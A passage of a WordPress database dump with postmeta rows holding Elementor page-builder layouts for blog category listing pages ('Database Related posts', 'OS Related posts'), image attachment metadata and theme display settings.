(3376,725,'_elementor_data','[{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3378,725,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3379,726,'_elementor_edit_mode','builder'),
(3380,726,'_elementor_template_type','wp-page'),
(3381,726,'_elementor_version','3.12.2'),
(3382,726,'_elementor_pro_version','3.12.3'),
(3383,726,'_wp_page_template','default'),
(3384,726,'_elementor_data','[{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3386,726,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3387,727,'_elementor_edit_mode','builder'),
(3388,727,'_elementor_template_type','wp-page'),
(3389,727,'_elementor_version','3.12.2'),
(3390,727,'_elementor_pro_version','3.12.3'),
(3391,727,'_wp_page_template','default'),
(3392,727,'_elementor_data','[{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3394,727,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3395,728,'_elementor_edit_mode','builder'),
(3396,728,'_elementor_template_type','wp-page'),
(3397,728,'_elementor_version','3.12.2'),
(3398,728,'_elementor_pro_version','3.12.3'),
(3399,728,'_wp_page_template','default'),
(3400,728,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"Database Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3402,728,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3403,729,'_wp_attached_file','2021/02/podcast-scaled.webp'),
(3404,729,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:27:\"2021/02/podcast-scaled.webp\";s:8:\"filesize\";i:131224;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"podcast-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14138;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"podcast-1024x1024.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:81220;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"podcast-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5056;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"podcast-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:55668;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"podcast-1536x864.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68062;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"podcast-2048x1152.webp\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:99356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"podcast.webp\";}'),
(3405,729,'_wp_attachment_image_alt','podcast'),
(3407,329,'_thumbnail_id','729'),
(3409,731,'_wp_attached_file','2020/11/fedora.png'),
(3410,731,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:18:\"2020/11/fedora.png\";s:8:\"filesize\";i:68064;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"fedora-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18059;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"fedora-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:71706;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"fedora-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8133;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"fedora-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51723;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3411,731,'_wp_attachment_image_alt','fedora'),
(3413,312,'_thumbnail_id','731'),
(3414,732,'_wp_attached_file','2020/03/apache_httpd.png'),
(3415,732,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:458;s:4:\"file\";s:24:\"2020/03/apache_httpd.png\";s:8:\"filesize\";i:53385;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"apache_httpd-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14317;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"apache_httpd-1024x458.png\";s:5:\"width\";i:1024;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46006;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"apache_httpd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6862;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"apache_httpd-768x458.png\";s:5:\"width\";i:768;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28306;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3416,732,'_wp_attachment_image_alt','apache_httpd'),
(3418,305,'_thumbnail_id','732'),
(3419,305,'_edit_last','2'),
(3434,712,'_edit_lock','1683742423:2'),
(3435,738,'_elementor_edit_mode','builder'),
(3436,738,'_elementor_template_type','page'),
(3437,738,'_elementor_version','3.12.2'),
(3438,738,'_elementor_pro_version','3.12.3'),
(3439,738,'_wp_page_template','elementor_canvas'),
(3440,738,'_elementor_data','[{\"id\":\"735a55e8\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"399ff891\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"]},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3442,739,'_elementor_edit_mode','builder'),
(3443,739,'_elementor_template_type','page'),
(3444,739,'_elementor_version','3.13.1'),
(3445,739,'_elementor_pro_version','3.12.3'),
(3446,739,'_wp_page_template','elementor_canvas'),
(3447,739,'_elementor_data','[{\"id\":\"735a55e8\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"399ff891\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3449,712,'_edit_last','2'),
(3450,740,'_elementor_edit_mode','builder'),
(3451,740,'_elementor_template_type','page'),
(3452,740,'_elementor_version','3.13.1'),
(3453,740,'_elementor_pro_version','3.12.3'),
(3454,740,'_wp_page_template','elementor_canvas'),
(3455,740,'_elementor_data','[{\"id\":\"735a55e8\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"399ff891\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_meta_data\":[\"date\"],\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3457,712,'_wp_old_slug','posts_all_template'),
(3458,741,'_edit_lock','1683743217:2'),
(3459,741,'_edit_last','2'),
(3460,741,'page_footer_attribution','default'),
(3461,741,'page_footer_is_sticky','default'),
(3462,741,'page_elementor_header_template','388'),
(3463,741,'page_header_use_legacy','default'),
(3464,741,'page_overlay_header','default'),
(3465,741,'page_header_top_sticky','default'),
(3466,741,'aux_page_template_content_location','above-in-frame'),
(3467,741,'page_elementor_footer_template','358'),
(3468,741,'page_footer_use_legacy','default'),
(3469,741,'page_header_section_use_legacy','default'),
(3470,741,'page_header_menu','default'),
(3471,741,'display_page_header_cover','0'),
(3472,741,'page_header_navigation_layout','default'),
(3473,741,'page_header_width','default'),
(3474,741,'page_header_search_button','default'),
(3475,741,'page_header_logo_display','default'),
(3476,741,'page_header_border_bottom','default'),
(3477,741,'page_header_animation','default'),
(3478,741,'page_header_color_scheme','default'),
(3479,741,'page_header_sticky_color_scheme','default'),
(3480,741,'page_header_logo_can_scale','default'),
(3481,741,'page_vertical_header_items_align','default'),
(3482,741,'page_vertical_menu_footer_display','default'),
(3483,741,'page_vertical_header_search_border','default'),
(3484,741,'page_header_social_icons','default'),
(3485,741,'page_header_social_icons_size','default'),
(3486,741,'page_top_header_section_use_legacy','default'),
(3487,741,'aux_show_topheader','default'),
(3488,741,'aux_topheader_layout','default'),
(3489,741,'aux_show_topheader_message','default'),
(3490,741,'aux_show_topheader_secondary_message','default'),
(3491,741,'page_general_footer_section_use_legacy','default'),
(3492,741,'page_show_footer','default'),
(3493,741,'page_footer_components_layout','default'),
(3494,741,'page_show_subfooter','default'),
(3495,741,'content_layout','default'),
(3496,741,'page_layout','default'),
(3497,741,'page_sidebar_style','default'),
(3498,741,'show_content_top_margin','default'),
(3499,741,'page_show_goto_top_btn','default'),
(3500,741,'page_goto_top_alignment','default'),
(3501,741,'aux_title_bar_show','default'),
(3502,741,'subtitle_position','before'),
(3503,741,'aux_title_bar_preset','default'),
(3504,741,'aux_title_bar_enable_customize','0'),
(3505,741,'aux_title_bar_content_width_type','boxed'),
(3506,741,'aux_title_bar_content_section_height','auto'),
(3507,741,'aux_title_bar_title_show','1'),
(3508,741,'aux_title_bar_heading_bordered','0'),
(3509,741,'aux_title_bar_heading_boxed','0'),
(3510,741,'aux_title_bar_meta_enabled','0'),
(3511,741,'aux_title_bar_bread_enabled','1'),
(3512,741,'aux_title_bar_bread_bordered','0'),
(3513,741,'aux_title_bar_text_align','left'),
(3514,741,'aux_title_bar_overlay_pattern','none'),
(3515,741,'aux_title_bar_overlay_pattern_opacity','0.15'),
(3516,741,'aux_title_bar_color_style','dark'),
(3517,741,'aux_title_bar_bg_show','0'),
(3518,741,'aux_title_bar_bg_parallax','0'),
(3519,741,'aux_title_bar_bg_size','cover'),
(3520,741,'aux_custom_bg_show','0'),
(3521,741,'aux_custom_bg_repeat','repeat'),
(3522,741,'aux_custom_bg_attach','scroll'),
(3523,741,'_elementor_edit_mode','builder'),
(3524,741,'aux_custom_bg_position','left top'),
(3525,741,'aux_custom_bg_size','auto'),
(3526,741,'top_slider_id','none'),
(3527,741,'aux_metafields_custom_styles',''),
(3528,741,'_elementor_template_type','wp-page'),
(3529,741,'_elementor_version','3.13.1'),
(3530,741,'_elementor_pro_version','3.12.3'),
(3531,741,'_wp_page_template','default'),
(3532,741,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"OS Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"50\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3534,741,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3536,742,'_edit_lock','1683742625:2'),
(3537,742,'_edit_last','2'),
(3538,742,'page_footer_attribution','default'),
(3539,742,'page_footer_is_sticky','default'),
(3540,742,'page_elementor_header_template','388'),
(3541,742,'page_header_use_legacy','default'),
(3542,742,'page_overlay_header','default'),
(3543,742,'page_header_top_sticky','default'),
(3544,742,'aux_page_template_content_location','above-in-frame'),
(3545,742,'page_elementor_footer_template','358'),
(3546,742,'page_footer_use_legacy','default'),
(3547,742,'page_header_section_use_legacy','default'),
(3548,742,'page_header_menu','default'),
(3549,742,'display_page_header_cover','0'),
(3550,742,'page_header_navigation_layout','default'),
(3551,742,'page_header_width','default'),
(3552,742,'page_header_search_button','default'),
(3553,742,'page_header_logo_display','default'),
(3554,742,'page_header_border_bottom','default'),
(3555,742,'page_header_animation','default'),
(3556,742,'page_header_color_scheme','default'),
(3557,742,'page_header_sticky_color_scheme','default'),
(3558,742,'page_header_logo_can_scale','default'),
(3559,742,'page_vertical_header_items_align','default'),
(3560,742,'page_vertical_menu_footer_display','default'),
(3561,742,'page_vertical_header_search_border','default'),
(3562,742,'page_header_social_icons','default'),
(3563,742,'page_header_social_icons_size','default'),
(3564,742,'page_top_header_section_use_legacy','default'),
(3565,742,'aux_show_topheader','default'),
(3566,742,'aux_topheader_layout','default'),
(3567,742,'aux_show_topheader_message','default'),
(3568,742,'aux_show_topheader_secondary_message','default'),
(3569,742,'page_general_footer_section_use_legacy','default'),
(3570,742,'page_show_footer','default'),
(3571,742,'page_footer_components_layout','default'),
(3572,742,'page_show_subfooter','default'),
(3573,742,'content_layout','default'),
(3574,742,'page_layout','default'),
(3575,742,'page_sidebar_style','default'),
(3576,742,'show_content_top_margin','default'),
(3577,742,'page_show_goto_top_btn','default'),
(3578,742,'page_goto_top_alignment','default'),
(3579,742,'aux_title_bar_show','default'),
(3580,742,'subtitle_position','before'),
(3581,742,'aux_title_bar_preset','default'),
(3582,742,'aux_title_bar_enable_customize','0'),
(3583,742,'aux_title_bar_content_width_type','boxed'),
(3584,742,'aux_title_bar_content_section_height','auto'),
(3585,742,'aux_title_bar_title_show','1'),
(3586,742,'aux_title_bar_heading_bordered','0'),
(3587,742,'aux_title_bar_heading_boxed','0'),
(3588,742,'aux_title_bar_meta_enabled','0'),
(3589,742,'aux_title_bar_bread_enabled','1'),
(3590,742,'aux_title_bar_bread_bordered','0'),
(3591,742,'aux_title_bar_text_align','left'),
(3592,742,'aux_title_bar_overlay_pattern','none'),
(3593,742,'aux_title_bar_overlay_pattern_opacity','0.15'),
(3594,742,'aux_title_bar_color_style','dark'),
(3595,742,'aux_title_bar_bg_show','0'),
(3596,742,'aux_title_bar_bg_parallax','0'),
(3597,742,'aux_title_bar_bg_size','cover'),
(3598,742,'aux_custom_bg_show','0'),
(3599,742,'aux_custom_bg_repeat','repeat'),
(3600,742,'aux_custom_bg_attach','scroll'),
(3601,742,'_elementor_edit_mode','builder'),
(3602,742,'aux_custom_bg_position','left top'),
(3603,742,'aux_custom_bg_size','auto'),
(3604,742,'top_slider_id','none'),
(3605,742,'aux_metafields_custom_styles',''),
(3606,742,'_elementor_template_type','wp-page'),
(3607,742,'_elementor_version','3.12.2'),
(3608,742,'_elementor_pro_version','3.12.3'),
(3609,742,'_wp_page_template','default'),
(3610,742,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"OS Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"50\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3612,742,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3614,743,'_elementor_edit_mode','builder'),
(3615,743,'_elementor_template_type','wp-page'),
(3616,743,'_elementor_version','3.12.2'),
(3617,743,'_elementor_pro_version','3.12.3'),
(3618,743,'_wp_page_template','default'),
(3619,743,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"Database Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More 